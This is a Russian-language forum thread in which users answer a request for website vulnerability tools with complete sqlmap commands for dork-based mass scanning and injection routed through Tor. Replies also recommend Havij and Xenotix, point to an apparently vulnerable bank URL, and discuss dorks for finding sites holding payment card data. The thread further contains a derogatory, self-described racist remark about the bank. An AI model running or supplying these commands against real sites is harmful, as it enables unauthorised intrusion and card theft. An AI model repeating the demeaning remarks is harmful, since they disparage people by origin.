Софт для поиска уязвимости.

Здравствуйте хорумчане.
Вопрос по софту. Интресует платный или бесплатный софт для поиска уязвимости сайтов.
Также готов пройти обучение да бы узнать что-то новенькое.
Спасибо.

SQL качаешь Sqlmap воодишь sqlmap -g "Дорка" --smart --gpage 10 --batch --dbms=mysql --risk=3 --level=5 --time-sec=15 --tor --tor-type=SOCKS5 --random-agen --threads=10
Для чего служат команды можно найти в палике, расписывать не буду
сама иньекция sqlmap -u УРЛ Уязвимости --dbs --dbms=mysql --risk=3 --level=5 --identify-waf --check-waf --time-sec=15 --tor --tor-type=SOCKS5 --random-agen --threads=10

XSS-Xenotix XSS Exploit Framework


Выше упомянутые программы как вы заметили работают по двум уязвимостям.Для общего пентеста посоветую OWASP ZAP и ясное дело Burp_Suite_Pro, который на мой взгляд является лучшим). По обеим программам есть мого обучаешего видео на ютубе.

А если обобщить - качайте Kali Linux ставьте на вм и Офигивайте от кол-ва интересующих вас программ)

Я руками все привык делать, если ты думаешь что существует только SQL уязвимость, то ты глубоко ошибаешься.
школота все сайты наверное уже взломала со своим хавижом, если хозяин магазина себя уважает, то вряд ли там будет такая глупая дырка

Значит тут он себя не уважает) http://www.salaamsom...pages.php?id=1'
А вроде банк должен уважать)

Сомалийский банк, они тупее моего кота наверное

А так в принципи если льется хави,то зачем придумывать велосипед, главное выбирать другую нишу сайто а ни шоп, чтобы дорки и тд были так сказать приват) Ну а самое главное , искать всётаки нужно ручками...Тут подилюсь может кто ни знает, если вам пошасливолось найти картон в любом виде на сайте, по этой дорке 70% сайтов будут с картоном, тогда уже вбивает дорку в гугл и до посинения начинаем искать.....
пс Сомалийский банк, они тупее моего кота наверное Ну ты прям Расист :blink:/>

На счет расиста, есть такой грешок. Думают не головой, а что между ногами болтается
Много разных уязвимостей нужно знать - это преимущество, школота хоть на сайте не гавнила

Ладно думаю флуда достаточно наделали /> Но думаю что до ТС донесли что он хотел)
ПС ты меня прям заинтриговал со своими Разными уязвимостями, если не затруднит кинь в пм. названия Охота поиграться

Спасибо!!! Многие ответы улыбнули))) Буду учится!
PS: Прошу дополнить если еще что-то ребята упустили.! />

Присоеденяюсь.

Jsky иши гугла